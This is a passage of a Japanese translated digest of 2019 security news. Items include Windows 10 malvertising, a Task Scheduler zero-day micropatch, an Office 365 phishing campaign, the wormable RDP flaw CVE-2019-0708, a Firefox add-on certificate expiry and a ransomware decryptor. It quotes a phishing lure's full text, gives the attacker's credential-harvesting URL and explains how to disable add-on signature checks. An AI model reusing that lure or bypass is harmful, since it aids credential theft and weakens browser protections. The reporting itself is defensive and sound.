     より最近の出来事としては、4月中旬、Evernoteは、攻撃者がローカルに格納されたアプリケーションや標的にしているMac上のファイルを遠隔から実行することを可能にするパストラバーサル脆弱性(【訳註】WebアプリケーションのURLやそのパラメータに特定の文字列を与えることで、非公開のディレクトリやファイルにアクセスできてしまう脆弱性(security.c-inf.comより))を修正している。


    Windows 10アプリケーションが、Adブロッカーが絶対に止めることができない悪意ある広告に襲われている
    BleepingComputer : News>Security(2019/06/03)
     ドイツのWidnows 10ユーザ達は、コンピュータを使用している間に、彼らのDefaultブラウザが突然悪意ある広告とスカムを開くとレポートしている。これらの広告は、広告をサポートするアプリケーション中に表示されるMicrosoft Advertisingネットワーク上での悪意あるキャンペーンによって表示される。
     無料のアプリケーションを収益化するための方法として、Microsoftは、Windows 10アプリケーション開発者に、彼らのアプリケーション中に広告を表示するためにMicrosoft Advertising SDKを使用する能力を提供している。例えば、Microsoft NewsとMicrosoft Jigsawは、広告を表示するためにMicrosoft Advertisingを活用している。


    Microsoft NewsとMicrosoft Jigsawのドイツ語広告(画像をクリックすると拡大されます)

     週末に渡り、突然技術サポートスカム、富くじ、アンケート調査詐欺、商品ルーレットでの当選を押し付けてくるサイトを開いたとするドイツのWindows 10ユーザからの多くのレポート[1, 2, 3]があった。このような広告は、彼らがMicrosoft News, Microsoft Jigsaw, 他のMicrosoft Advertisingをサポートしているアプリケーションのようなアプリケーションを使用している間に突然開いている。
     例えば、以下の広告は、あるユーザに対して示されたものであり、コンピュータが感染していると述べるシステムスキャンを装っている。ユーザが、このスクリーンを経由すると、スカムページは、最終的に不要なシステムクリーナープログラムをダウンロードするように促してくる。


    悪意ある広告キャンペーンで表示される技術サポートスカム(画像をクリックすると拡大されます)

     これらの広告は、新しいウィンドウで自動的にスカムサイトを起動するためのJavaScriptを使用するMicrosoft Advertisingネットワークで広告キャンペーンを購入したスカマーによって発生させられている。これらの広告は広告サポートアプリケーション中に表示される時に、Windows 10は、代わりにDefaultブラウザに新しいページを起動する。
     4月に、Microsoftアプリケーションのフランスのユーザをターゲットにした類似の悪意ある広告キャンペーン同様に、このドイツでのキャンペーンは、レジデンシャルIPアドレス上のユーザのみをターゲットにしているようである。例えば、ドイツのIPアドレスへのアクセスを取得するためにVPNを使用しているなら、この悪意ある広告は表示されない。

    Adブロッカーは役に立たない

     これらの広告は広告サポートアプリケーションのために表示されているので、あなたのブラウザにインストールされている如何なるAdブロッカーも、このページの読み込みを防ぐことはない。
     これは、Adブロッカーによって通常ブロックされるスクリプトが、このアプリケーションによって使用されているため、Windows 10は、ブラウザにWebページを読み込むことになる。
     代わりにユーザは、既知の悪意あるWebサイトをブロックするために、セキュリティソフトやSmartScreenやSafe Browsingのようなブラウザ組み込みのフィルタリングサービスを信頼する必要があるだろう。


    悪意あるWebサイトをブロックしているESET

     他のオプションは、既知の広告ネットワークと悪意あるサイトへの接続を全てブロックするHOSTSファイルをインストールすることである。


    Windows 10タスクスケジューラ中の0-Dayフロー用のマイクロパッチがリリースされた
    BleepingComputer : News>Security(2019/05/31)
     Windows 10中で未パッチのローカル特権昇格の0-Dayの脆弱性用の一時的なパッチが本日リリースされた。この修正は、0patchプラットフォームを介して配布され、再起動することなくシステムに適用することができる。
     この0-Day用のエクスプロイトコードは、研究者SandboxEscaper(彼女が10日前に公開した時BearLPEと名付けていた)から入手でき、Windows 10のタスクスケジューラ コンポーネントをターゲットにしている。
     攻撃者は、SYSTEMやTrustedInstallerのような高い特権を有するユーザに対して提供されるファイルを乗っ取るためにターゲットのホストを改竄した後、このバグを使用することができる。
     Will Dormann(CERT/CCの脆弱性アナリスト)によると、この脆弱性攻撃は、X86システムでは100%の信頼性があるので、X64マシンに再コンパイルする必要がある。
     0patchの共同設立者Mitja Kolsekは、古いシステムから最新のシステムに追加することが可能な、タスクファイルのレガシー(【訳註】新しいものにとって代わられたものを指す言葉)サポートから生じていると説明している。  以下のビデオは、脆弱性のあるシステムで、このマイクロパッチが動作する方法をデモしている。

     「Windows XP schtasks.exeをWindows 10で実行すると、レガシーRPC関数(Remote Procedure Call。「関数呼び出し」をローカルではなく別の環境に接続して代わりに実行しようというもの(Quiitaより))がコールされる。これは順番に、SchRpcSetSecurityのような現在の関数をコールすることになる」とKolsekは発言している。

     この欠陥は何か? 既にSandboxEscaperや他の研究者によって疑われているように、これは不正な成り済ましのケースであるが、ひねりが加えられている。最初に問題の原因と考えられていたSchRpcSetSecurityメソッドは、正確に呼び出し元を偽装して、正確に実行している。 。

     彼は続けて、「taskcomp.dllスレッド中のコードは、Local Systemとして実行され、呼び出し元は攻撃者である。しかし、このコードがSchRpcSetSecurityを呼び出す前では、呼び出し元は偽装されていない。SeRestorePrivilege特権を有効にする(ファイルパーミッションを変更する必要がある)ために『自身』を偽装している。」
     その結果、この要求は限定的ユーザではなくLocal Systemから発生する。これはそのマシン上での特権の昇格なので、重要なフィアルをコントロールすることができる。
     このマイクロパッチは、メモリ内で修正命令を実行し、通常ユーザがシステムファイルに持っているパーミッションのセットの変更を妨げる。


    画像をクリックすると拡大されます

     既存の0patchユーザーは全員、既に修正プログラムを持っており、自分のマシン上で実行している。マイクロパッチを取得するには、アカウントを作成し、0patchエージェントをインストールする必要がある。
     現時点では、Windows 10 v1809 32bit、Windows 10 v1809 64bit、およびWindows Server 2019で利用可能であるが、他のバージョンでも利用可能になると思われる。有料顧客は、0patchサポートアドレスをe-Mailし、他のプラットフォームにこのパッチを移植することを要求することができる。


    Flipboadユーザのe-Mailアドレスとハッシュ化パスワードが盗まれた
    Graham Cluley : News(2019/05/29)
    Flipboard(【訳註】AndroidとiOS、WindowsPhone に対応する雑誌形式のソーシャルネットワークアグリゲーションアプリケーションソフトウェア)は、「セキュリティ上の重大事案」(単にハッキングされたと言うことに代わる企業用語)について、そのWebサイト上で通知を発表した。
     世界中で数百万人の人々によって使用されている新しいアグリゲーションサイトは、最近ハッカーがFlipboardユーザのアカウントの詳細(ユーザ名、e-Mailアドレス、ハッシュ化パスワード、サードパーティーのソーシャルメディアアカウント用のアカウントトークン)を含むデータベースにアクセスしていたことを発見した。
     Flipboardによると、ハッカーがアクセスした期間は2回(2018年6月2日から2019年3月23日の凡そ10ヶ月間と、2019年4月21-22日)ある。
     ユーザはFlipboardから、ユーザのパスワードはリセットされたと伝えるe-Mailを受け取っている。次回のログイン時に、ユーザは新しいパスワードを作成するよう要請されるだろう。


     明らかに、インターネット上の他の場所で侵害されたパスワードを使用していないことを確認することはユーザにとって理にかなったことである。このサイト上で始終論議しているように、異なる場所で同じパスワードを決して使用してはならない。あなたの貧弱な人間の脳が、異なる場所での多くの一意で複雑なパスワードを思い出すことができないのであれば、あなたは私と同じ状況にある。代わりに適切なパスワードマネージャを使用しなさい。
     e-Mailアドレスが現在ハッカーの手に落ちている可能性を考慮しなさい。ユーザはFlipboardから送信されたかのようなフィッシングe-Mailに気をつけるのは賢明なことだろう。
     伝えられるところによると、Flipboardはパスワード保管用のSHA-1ハッシュ化アルゴリズムをbcryptに切り替えている。これは、2012年に重視された。

     ユーザが、2012年3月14日以降パスワードを作成もしくは変更している場合、bcryptと呼ばれる関数でハッシュ化されている。ユーザがその時点以降パスワードを変更していない場合は、SHA-1でソルト付きハッシュ化されている。

     率直に言って、Flipboardが、2012年により強力なハッシュアルゴリズムを導入した時点で、ユーザーにパスワードの再設定を強制することが適切な考えだったかもしれない。
     Flipboardは、セキュリティ侵害に関して法執行機関に通知したと発言している。


    フィッシングe-Mailは、Office365の「ファイル削除」警告を装っている
    BleepingComputer : News>Security(2019/05/28)
     新たなフィッシングキャンペーンは、"Office 365 Team"の受信者への警告(異常な数のファイル削除がアカウント上で発生している)を装って進行中である。
     以下に示すフィッシングスカムは、重大度-中が発生しているとするOffice 365サービスからの警告を装っている。次に、ユーザのOffice 365アカウントで多量のファイル削除が発生しており、ユーザはこの警告を検証する必要があるとしている。


    Office 365フィッシングメール(画像をクリックすると拡大されます)

     このフィッシングスカムの本文は以下である。

    A medium-severity alert has been triggered
    Unusual volume of file deletion
    Severity: Medium
    Time: 05/26/2019 07:36:39 pm (UTC)
    Activity: FileDeleted
    Details: 15 matched activities in 5 minutes.
    View alert details

    Thank you,
    The Office 365 Team

     "View alert details"リンク(【訳註】この記事の最初の画像の下部)をクリックすると、インチキのMicrosoftアカウントログインページに連れ込まれログインを促される。


    フィッシングスカムが連れ込むページ(画像をクリックすると拡大されます)

     このページはAzure(【訳註】オープンで柔軟な、エンタープライズ レベルのクラウド コンピューティング プラットフォーム(Microsoftのページより))をホストしているので、このサイトはMicrosoftによって署名された証明書で保護されている。これにより、Microsoftが認可したURLとして表示されるようになり、スキームに正当性が追加される。 Azureはこの目的のために詐欺師による使用が増大している。


    Microsoftの証明書

     パスワードを入力すると、e-Mailアドレスとパスワードが https://moxxesd.azurewebsites.net/handler.php Webページに送信される。このWebページは攻撃者の制御下にある。詐欺師は、入力された認証を保存し、後にこれらの情報を取得する。


    認証を盗むための送信(画像をクリックすると拡大されます)

     連れ込まれたページは、次に犠牲者を正当な https://portal.office.com にリダイレクトするので、再びログインを要請されることになる。


    正当なMicrosoftのログインページ(画像をクリックすると拡大されます)

     今まで、我々は常に疑わしいドメインに関してはフィッシング連れ込みぺージか否かを詳細に検討するようにユーザにアドバイスしてきた。フィッシングページをAzure上にホストすることで、連れ込まれるページは、windows.net や azurewebsites.net のようなドメインに配置されているので、多少扱いにくくなっている。
     MicrosoftアカウントとOutlook.comログインに関しては、ログインフォームはmicrosoft.com, live.com, outlook.comドメインだけであることを覚えていることが重要である。Microsoftログインフォームを他のURLで表示された場合には、近づいてはならない。


    Microsoftからの警告: SIDを削除するとWindows 10は破壊される
    Sophos : NakedSecurity (2019/05/22)
     Microsoftは、管理者やユーザが万一偶然にアプリケーションを破壊した場合でもWindows account security identifier (SID) の’capability’(ケーパビリティ)と呼ばれるものを削除しないように注意を促している。
     Windows 8とWindows Server2012以降のOSの一部であるある種のSIDにMicrosoftが警告を発生させた理由は明らかではないが、認識の欠如がサポートの問題を発生させていることを意味している。
     UNIXのUIDに少しにているが、SIDSは、ユーザ、アカウント、グループを同定し、その他の人々にアクセスを許可しているのか否かを決定するためのWindowsシステムの基本部分である。
     Windowsユーザ(例えば、Aliceとしよう)が彼女の名前で彼女のコンピュータにアカウントを設定すると、Windowsは、一意のSIDを使用してそのアカウントを同定する。Aliceは希望すれば彼女のアカウント名を変更することができる(AliceBやJeffにさえ)が、Windowsに識別させる基になるSIDは常に同じ名前のままである。
     2012年の全面的な見直しで、SIDSはファイル アクセス、ドライブ ロケーション、証明書へのアクセス、カメラ、リムーバルストレージ等を含むように拡張された
     Microsoftによると、Windows 10 1809は、これらの300以上を使用することができ、そのうち最も一般的なものは、以下のようなものである。

    S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681

     これが、読み取り専用で「不明なアカウント」として表示されている場所をレジストリ・エディタ(スタート > ファイル名を指定して実行 > regedt32.exe)を使用して徹底的に掘り下げている全ての人々を混乱させている理由を確認するのは簡単である。
     到達した後、これは再起動後に再稼働するためにWindows自体が必要とするもの(ある種のグローバルSID)であるかもしれないと思わせる。
     これは、SIDの目的を理解せずにSIDを削除したあらゆる人々が、Windows自体を破壊する可能性があることを意味している。Microsoftの警告では、

     レジストリもしくはファイルシステムパーミッションからケーパビリティSIDSを削除するな。ファイルシステムパーミッションやレジストリパーミッションからケーパビリティSIDSを削除すると、機能やアプリケーションが不正に動作する可能性がある。ケーパビリティSIDSを削除すると、それを戻すためにUIを使用できない。

     更に検索すると、このSIDに関してサポートフォーラムでアドバイスを求めるユーザがいた。正当なものであることに気づかずに、管理者がSIDを削除し、そのことを後悔している例である。

    分かり難い名前

     どれが正当なSIDSで何れが疑わしいSIDSなのかを管理者が解決する方法は?
     Microsoftは、ケーパビリティIDは「分りやすい」(つまり理解しやすい)ものではないと認めているため、これらを単独で使用しても役に立たないと、指摘している。

     設計上、ケーパビリティSIDを分りやすい名前にはしない。

     この答えは、全てのケーパビリティSIDSは、レジストリエントリ(スタート > ファイル名を指定して実行 > regedt32.exe)中に表示されているので、以下のレジストリエントリを見て回るべきであるということである。

    HKEY_LOCAL_MACHINE \ ソフトウェア \ Microsoft \ SecurityManager \ CapabilityClasses \ AllCachedCapabilities

    そのSIDが、このリストに載っていない場合は、それが未だ合法的なサードパーティのケーパビリティであるかもしれないということを念頭に置いて、更なる調査を必要としている。


    Windows 10 のKB4494441アップデートはインストールを2回表示する可能性がある
    BleepingComputer : News>Security (2019/05/14)
     Microsoftとユーザのレポートによると、2019年5月のWindows 10 KB4494441累積アップデートは、一部のコンピュータでインストールを2回表示するバグが発生中である。ユーザが、このアップデートを2回確認しても、何も心配することはないし、Microsoftはこの問題を認識している。
     この問題は、このアップデートが二つの異なるインストレーションのステージを要求することで発生する。最初のステップは、アップデートと再起動の部分、インストールの二回目のステップは、このアップデートが再度提供され再起動させられる。ステージが正常に完了すると、このアップデートはインストレーションエントリを作成する、これが二度の表示に導くことになる。
     このバグが発生すると、以下の画像に示したように、"2019-05 Cumulative Update for Windows 10 Version 1809 for x64-based Systems (KB4494441)" が2回アップデートの履歴にリストされているのを確認するだろう。


    KB4494441が2回インストールされている(画像をクリックすると拡大されます)

     このアップデートをインストールし、一度だけしかリストされていない場合を含め、これは全てのWindows 10ユーザに影響を与えないことに注目すべきである。
     KB4494441サポート記事は、このバグに関連した既知の問題と共にアップデートされている。これを以下に示す。

     一部の顧客は、彼らのデバイスにKB4494441が2回インストールされるとレポートしている。
     特定のシチュエーションで、アップデートをインストールすると、複数のダウンロードと再起動のステップが要求される。このインストレーションの二つの中間ステップが問題なく完了すると、あなたのアップデートの履歴ページの表示は、このインストレーションが2回問題なく完了したことをレポートする。

     あなたに要求されるアクションは何もない。このアップデートのインストレーションは時間が掛かり数回の再起動を要求するかもしれないが、全ての中間インストレーション・ステップが完了した後、無事にインストールされるだろう。

     アップデートの履歴が最新の累積アップデート(LCU)のインストレーションを反映するように、このアップデートを改善するための作業を行っている。

     Microsoftは、この種の問題が発生しないように修正を作業中であると述べている。この修正は、このアップデートのアップデート版か、サービススタック更新プログラムとして提供されるだろう。

    KB4494441は重要なアップデートである

     ユーザは、たとえリストに2回あろうともKB4494441をアンインストールしようとしてはならない。このアップデートは多くのバグフィックスとセキュリティアップデート(最近アナウンスされたMicroarchitectural Data Sampling (MDS)脆弱性(【訳註】 数日前に報道されたIntel製CPUの脆弱性)を含む)を含んでいる。
     ZombieLoad, RIDL, Falloutとも呼ばれるこの新しいMDS投機的実行の脆弱性は、悪意あるプロセスがCPUのメモリバッファから情報を盗むことを可能にするものである。これは、暗号化キー、パスワード、他の重要な情報を盗むことも可能にする。
     それ故、 これらの攻撃を妨げる役に立つ緩和策を含んでいるので、KB4494441がインストールされたままにしておくことが重要である。
     我々はまた、セキュリティアップデート用の既知のMDSの脆弱性アップデートとアドバイザリ、緩和策、およびハードウェアデバイスや他の企業のソフトウェア用のアドバイザリのリストも作成している。


    Microsoft: 緊急のリモートデスクトップフローを修正、ワームマルウェアをブロック
    BleepingComputer : News>Security (2019/05/14)
     Microsoftは本日、リモートデスクトップサービス(RDS)中に発見されたリモードコード実行(RCE)の緊急の脆弱性をパッチした。これは、悪意ある行動主体が脆弱性のあるRDSインストレーションを実行しているコンピュータ間を伝搬するように設計したマルウェアの作成を可能にするものである。
     MicrosoftのWindows IT Pro Centerによると、「リモートデスクトップサービス(RDS)は、個々の仮想化アプリケーションの提供、安全なモバイルおよびリモートデスクトップアクセスの提供、エンドユーザにクラウドからのアプリケーションおよびデスクトップを実行する能力の提供など、あらゆる最終顧客に必要な仮想化ソリューションの構築に最適なプラットフォームである。」
     Microsoftのセキュリティアドバイザリでは詳細として、

     認証されていない攻撃者が RDP を使用して標的のシステムに接続し、特別に細工された要求を送信する場合、リモート デスクトップ サービス (旧称ターミナル サービス) にリモートでコードが実行される脆弱性が存在します。攻撃者がこの脆弱性を悪用した場合、標的のシステムで任意のコードを実行する可能性があります。攻撃者は、その後、プログラムのインストール、データの表示、変更、削除などを行ったり、完全なユーザー権限を持つ新たなアカウントを作成したりする可能性があります。
     この更新プログラムは、リモート デスクトップ サービスが接続要求を処理する方法を修正することにより、この脆弱性を解決します(【訳註】Microsoftの日本語サイトより引用)

    Windowsの旧バージョンが影響を受ける

     CVE-2019-0708として追跡される緊急のRDS脆弱性は、サポート中のWindowsの旧バージョン(即ち、Windows 7, Windows Server 2008 R2, and Windows Server 2008)にのみ影響を与える。影響を受けるバージョンのセキュリティアップデートは、Microsfot Security Update Guideから利用可能であると、Microsoftは発言している。
     「Windowsのサポート中のバージョンを使用し、自動アップデートを有効にしているユーザは、自動的に保護される」とMicrosoftは発言している。
     Windows XPやWindows 2003のようなサポート対象外のオペレーティングシステムもまた、この緊急のCVE-2019-0708フローの影響をうける。これらのWindowsバージョンのユーザは、新しいOSにアップグレードするか、KB4500705から利用可能なセキュリティアップデートを適用するかの何れかを実行しなさい。
     Windows 8とWindows 10ユーザは、最新のWindowsのリリースでMicrosftによって提供された、強化されたセキュリティのために、この脆弱性による影響は受けない。

    このセキュリティフローは'wormable'(ワームの侵入を許す)ものであり、緩和可能

     この脆弱性のあるシステムでRemote Desktop Services Connectionsに関してNetwork Level Authentication (NLA) を有効にすると、「リモートデスクトップ接続を確立してログオン画面が表示される前にユーザー認証を完了することができるため、この脆弱性は部分的に緩和される。これは、悪意あるユーザと悪意あるソフトウェアからリモートコンピュータの保護に役立つ、より安全な認証である。」
     それにも拘わらず、潜在的な攻撃者が、RDSが有効になっているシステムの認証を受けるために必要な証明書を持っている場合には、依然としてRCE脆弱性を悪用することができる。
     更に悪いことに、Microsoft Security Response Center (MSRC)のインシデント・レスポンス ディレクタSimon Popeは、以下のように発言している

     この脆弱性は事前認証であり、ユーザの操作を要求しない。換言すれば、この脆弱性は'wormable'(ワームの侵入を許す)である。これは、この脆弱性を攻撃する将来のあらゆるマルウェアが、2017年に世界中に拡散したWannaCryマルウェアに類似した方法で、脆弱性のあるコンピュータから脆弱性のあるコンピュータに拡散できることを意味している。

     これは、身代金要求攻撃、ハッカー、このような'wormable'(ワームの侵入を許す)リモートデスクトップサービスのセキュリティフローのような脅威に晒されるため大変危険であるにも拘わらず、多くのサーバーが遠隔作業者のインターネット接続のためにリモートデスクトップサービスを公にアクセス可能にしているので、とりわけ危険である。
     「我々は、この脆弱性に対する攻撃を未だ確認していないが、悪意ある脅威の主体が、この脆弱性用の攻撃を記述し、それを彼らのマルウェアに組み込む可能性は高い」とMicrosftは発言している。
     Microsoftは、「NLAが有効か否かに拘わらず、影響を受ける全てのシステムは、可能な限り早急にアップデートすべきである」とアドバイスしている。
     Microsoftのスポークスマンのステートメントによると:

     我々は2019年5月14日に、この脆弱性を解決するためのアップデートをリリースした。旧オペレーティングシステムを使用している顧客は、Windowsの最新バージョンにアップデートするか、あるいは、早急にこのアップデートを適用することを推奨する。詳細な情報は、我々のブログとセキュリティアップデートガイドを参照されたい。」


    ユニクロが侵害され46,100アカウントを超えるデータを漏洩
    BleepingComputer : News>Security (2019/05/13)
     この件の詳細に関しましては、以下のリンクのサイトを参照して下さい。

    Internet Watch > ニュース > ユニクロ・GU公式サイトで不正ログイン、身体サイズや氏名・住所など含む46万件の個人情報が閲覧された可能性

    Fast Retailing公式サイト > 「リスト型アカウントハッキング(リスト型攻撃)」による弊社オンラインストアサイトへの不正ログインの発生とパスワード変更のお願いについて


    Firefoxアドオンは証明書の有効期限切れにより無効化された
    BleepingComputer : News>Security (2019/05/03)
    アップデート: Mozillaは、この問題に関する臨時の修正をリリースした。詳細情報は、この記事の末尾を参照。
     Mozilla Firefoxユーザは、彼らのアドオンの全てが突然無効化されていることを発見している。これは。Mozillaアドオンの署名に使用されている中間証明書の期限切れによって発生している。
     Reddit、Twitter、Bugzillaのバグレポートでの多くのレポートによると、ユーザは、彼らのアドオンが突然「これらの拡張機能は、現在のFirefox標準に適さないため無効化されています」のメッセージと共に無効化されたと主張している。


    無効化された拡張(画像をクリックすると拡大されます)

     彼らが無効化されたアドオンをFirefoxのアドオンサイトから再インストールした場合、彼らは「ダウンロードに失敗しました。接続を確認して下さい」のエラーメッセージが表示される。


    アドオンインストール時のエラー(画像をクリックすると拡大されます)

     テストしたところ、私は幾つかのアドオンをインストールできなかったが、全てではなかった。これは、有効期限が切れていない別の証明書によってアドオンが署名されていることが原因と考えられる。
     Bugzillaのバグレポートによると、Mozillaアドオンの署名に使用された中間署名証明書は、協定世界時2019年5月4日の深夜(日本時間5月5日、09:00)に期限切れになった。MozillaアドオンはFirefoxに使用された順番に署名される。コンピュータがその時刻に到達すると、Firefoxは自動的にアドオンを無効化する。


    Mozillaバグレポート(画像をクリックすると拡大されます)

     このバグレポートの最新の投稿はKevin Brosnan(Mozillaの上級品質保証技術者)によるものであり、彼らは、この問題を認識しており、問題を調査中であると述べている。


    Mozillaは問題を調査中(画像をクリックすると拡大されます)

    アドオンを再稼働させるには

     あなたにとって重要ではないアドオンに関しては、Mozillaが問題を解決し、あなたのアドオンが再稼働するまで待ちなさい。
     待てない人や、インストールしている拡張を即座に有効にしたい人には幾つかのオプションがある。

    方法1: コンピュータの時計を数日前に戻す。
     最も簡単な方法は、証明書を期限切れにしないようにするために、コンピュータの時計を数日前に戻すことである。これは上手くいくが、今日期限切れになった証明書でアクセスしたあらゆるサイトでも同様に上手くいくことを意味している。あなたのローカルメールクライアントからのEmailは、誤った日付になる。そして、一部のサイトは、間違った日付を表示するだろう。

    方法2: FirefoxのNightlyビルドかDeveloperビルドをインストールする。
     もう一つのオプションは、FirefoxのNightlyビルドかDeveloperビルドをインストールすることである。これらのバージョンでは、拡張へのシグネチャ要求を無効化することができる。  FirefoxのNightlyビルドやDeveloperビルドからこれを実行するには、about:configに進み、xpinstall.signatures.requiredを検索する。その設定をダブルクリックしFalseに切り替える。


    xpinstall.signatures.required設定(画像をクリックすると拡大されます)

     この設定をFalseにすると、無効化されたアドオンを再使用することができる。

    方法3: アドオンのデバッグを有効にする。
     ある読者が、デバッグモードを有効にし、それらのXPIファイルからローカルに拡張機能をインストールするという追加の提案を提示してくれた

     about:debuggingに移動して、addon debuggingチェックボックスをオンにする。その後、必要なアドオンのxpiファイルをロードする。すべての人に有効ではあるが、上記の回避策より遥かに複雑である。
     以下に示すように、「Firefoxに追加」ボタンを右クリックして「名前を付けてリンク先を保存」を選択することで、Firefoxアドオンサイトから直接アドオンをダウンロードすることができる。


    アドオン用のXPIファイルをダウンロード(画像をクリックすると拡大されます)

    アップデート 米国東部標準時 2019/05/04 午前10:25(日本時間 5月5日 00:25): MozillaはStudiesシステムを介してこの問題に関する臨時の修正をリリースしたと述べている。このシステムは、完全なアップグレードを実行せずにFirefoxに変更の適用を可能にする


    Mozillaからの解決策(画像をクリックすると拡大されます)

     Studyシステムを使用するには、以下に示すように、Firefoxのメニューから、編集 > 設定 > プライバシーとセキュリティ > Firefox に調査のインストールと実行を許可する(Firefoxのデータ収集と利用についてセクション)を有効にしておく必要がある(【訳註】Defaultで有効)。

     このアドオンの修正がFirefoxにインストールされている否かを確認するには、about:studiesに進み、実施中の調査リスト、もしくは、完了した調査リスト中に"hotfix-reset-xpi-verification-timestamp-1548973"呼ばれる調査を探す。あなたは、実施中の調査リスト中に、もしくは、完了した調査リスト中にも同様に"hotfix-reset-xpi-verification-timestamp-1548973"と呼ばれる調査を確認するかもしれない。


    Studies(調査)中に表示されるホットフィックス

     このホットフィックスがインストールされている場合は、あなたが最早Studies(調査)を受け取ることを希望せず、アドオンが再び動作しているのであれば、Studiesを再び無効化することができる。


    MegaLockerとNamPoHyu Virus身代金要求型マルウェア用の復号プログラムがリリースされた
    BleepingComputer : News>Security (2019/05/02)
     Emsisoftは、SambaサーバをターゲットにしていたMegaLockerとNamPoHyu Virus身代金要求型マルウェア用の復号プログラムをリリースした。現在、犠牲者は彼らのファイルを復号するために無料でこの復号プログラムを使用することができる。
     先月我々は、MegaLocker(NamPoHyu VirusはMegaLockerの新しいバージョン)身代金要求型マルウェア感染は、Sambaサーバをターゲットにし、遠隔からそのデータを暗号化していることをレポートした。その時点で、ファイルを復号化する方法が見つかるかもしれないので、犠牲者は身代金を支払わないようにと述べた。
     我々はMegaLockerとNamPoHyu Virusの犠牲者に無料の復号プログラムがEmsisoftから利用可能になったことを、喜びのうちにアナウンスする。

    MEGALOCKER DECRYPTOR(ダウンロードはこちらから)

     ダウンロードしたら、復号を開始する前に必ずインターネットに接続しておくことが必須である。起動し、脅迫文へ移動し、それを選択する。この復号プログラムは犠牲者の復号キーを復元しようとする。


    MegaLocker & NamPoHyu復号プログラム

     キーが発見されると、ファイルを復号するためにこの復号プログラムを無料で使用することができる。


    復号されたファイル

     この復号プログラムに関する質問があるのなら、我々のフォーラム中のMegaLocker NamPoHyu Virus Support & Helpトピックで自由に質問しなさい。

    身代金要求型マルウェアの開発者は不満である

     我々が身代金を支払わないように犠牲者に告げた時、この開発者は明らかに不満であった。
     このフォーラムでの我々のMegaLockerトピックへの一連の投稿で、この身代金要求型マルウェアの開発者は、復号プログラムが一週間以内にリリースされなければ、身代金を二倍にすると脅してきた。


    NamPoHyu開発者による投稿(画像をクリックすると拡大表示されます)

     この開発者は、イライラを募らせ、我々の支援者を「悪魔」と呼ぶまでに至った。その後、彼らはこの身代金要求型マルウェアに使用されている暗号化アルゴリズムを変更すると脅してきた。


    身代金要求型マルウェア開発者によるもう一つの投稿(画像をクリックすると拡大表示されます)

     この開発者が、彼の約束を守るか否か定かでないが、将来のバージョンがリリースされたなら、我々は間違いなく説明する。けれども現在、犠牲者は無料のEmsisoftの復号プログラムを使用してファイルを取り戻すことができる。


    Office 365アカウントがBECスカム中に使用されたATO攻撃を介して侵害されていた
    BleepingComputer : News>Security (2019/05/02)
     Office 365アカウントがアカウント乗っ取り(ATO)攻撃のターゲットにされ侵害されていた。これは、サイバー犯罪者が後に、スピアフィッシングやBEC(ビジネスメール詐欺)攻撃から悪意あるキャンペーンに至るまでの様々な不正な目的のために使用される。  Barracuda Networksの研究者が本日公開したレポートによると、脅威の行動主体によって2019年4月の一月の間に、ATOを介して侵害した凡そ4000アカウントを使用して、150万を超える悪意とスパムE-mailが配信されていた。
     また、Barracudaの顧客をターゲットにしたATO攻撃を解析したところ、この研究者は、モニターした組織の29%が、Office 365アカウントに侵入されていたことを発見した。
     Office 365アカウントを成功裏にハッキングすると、スカマーは、彼らの挙動を隠蔽するために悪意あるメールボックス規則を追加し、「侵害された凡そ4000アカウントの34%」のアカウントから送信された悪意ある広告メール、フィッシングメール、スパムメールを削除する。
     Barracudaの研究チームは、中国のIPアドレスから発信された疑わしいログインが、Office 365 ATO攻撃を調査している間、試行回数全体のほぼ4分の1を占めていることを発見した。この攻撃者はまた、ブラジル(9%)、ロシア(7%)、オランダ(5%)、ベトナム(5%)にあるサーバーも使用している。

    Office 365攻撃方法

     ATO攻撃を介して彼らのターゲットのアカウントに潜入するために、サイバー犯罪者は「ブランドの偽装、ソーシャルエンジニアリング、フィッシング」を組み合わせて使用している。以前に設定したフィッシング・ランディングページ(【訳註】外部からWebサイトにアクセスした時最初に開くフィッシング用のページ)を訪問させ、彼らのアカウントの資格情報を送信させることを、犠牲者になる可能性のある者に確信させるためにMicrosoftのような有名企業になりすましている。
     悪意ある行動主体はまた「今迄のデータ漏洩で取得したユーザ名とパスワードを悪用していた。人々がしばしば同じパスワードを異なるアカウントでも使い回しているという事実に基づき、ハッカーは盗んだ認証情報を再使用し、他のアカウントへのアクセスを取得することが可能だった」とBarracudaは発言している。
     個人用E-mailの盗まれた認証情報は後に、BEC (Business Email Compromise、ビジネスメール詐欺)あるいはEAC (Email Account Compromise)としても知られるキャンペーンの一部として、「ビジネスE-mailへのアクセスを取得しようとして」侵害されたOffice 365アカウントへのアクセスを取得するために使用されていた。
     ブルートフォース攻撃(ユーザが極めて簡単に推測できるパスワードを設定しているという事実を悪用する攻撃方法)もまた、この研究者によって観測されている。「攻撃はまた、Webと商用アプリケーションを介して行われている (SMS(【訳註】ショートメッセージサービス)を含む)」とも、このレポートは述べている。

    侵害されたOffice 365アカウントは犯罪者によって乱用されている

     サイバー犯罪者は、「攻撃を成功させるために、会社の業務方法、使用しているE-mailシグネチャ、金融取引の処理方法を知るために活動を監視し追跡している(他のアカウントへのログイン認証情報の取得を含む)。」
     攻撃の次の段階で、犯罪者は、ソーシャルエンジニアリングとスピアフィッシングの両方を使用し、侵害されたOffice 365アカウントを使用して財務部の役員や従業員の一部をターゲットにしている。
     FBIのInternet Crime Complaint Center (略称IC3、米国インターネット犯罪苦情センター)が4月に公開した2018年度インターネット犯罪レポートで説明されているように、この種のスカムは、背後に凡そ12億ドルの金融損失が存在しており、犯罪者は電信送金をターゲットにし、彼らの制御下にある銀行のアカウントにそれらをリダイレクトさせることに成功している。
     個人と企業の両方を対象にしたBEC/EAC攻撃は、IC3によると、信用/ロマンス詐欺、不動産詐欺、投資詐欺と共に、サイバー犯罪者にとっては最も利益をもたらすものであった。これは、2018年の犯罪タイプで、犠牲者に合計7億6300万ドルの損失をもたらしたものである。

    IC3の調査結果は、Proofpointの電子メールセキュリティのRob Holmes副社長によっても確認されている。彼は、「企業が電子メールの成り済まし攻撃の標的とされた頻度は、2018年では2017年との比較で3倍になっており、性能は高度になってきている。世界的な経済的影響に加えて、毎年この種の事件の多くが様々な理由で過少報告または未報告になっていることは注目に値する」と発言している。
     Barracudaのレポートによれば、ハッカーはまた、「個人情報、財務情報、機密データを盗み取り、個人情報の盗難、詐欺、その他の犯罪にそれを使用することによって攻撃を収益化するために、侵害したアカウントを使用する。

    軽減策

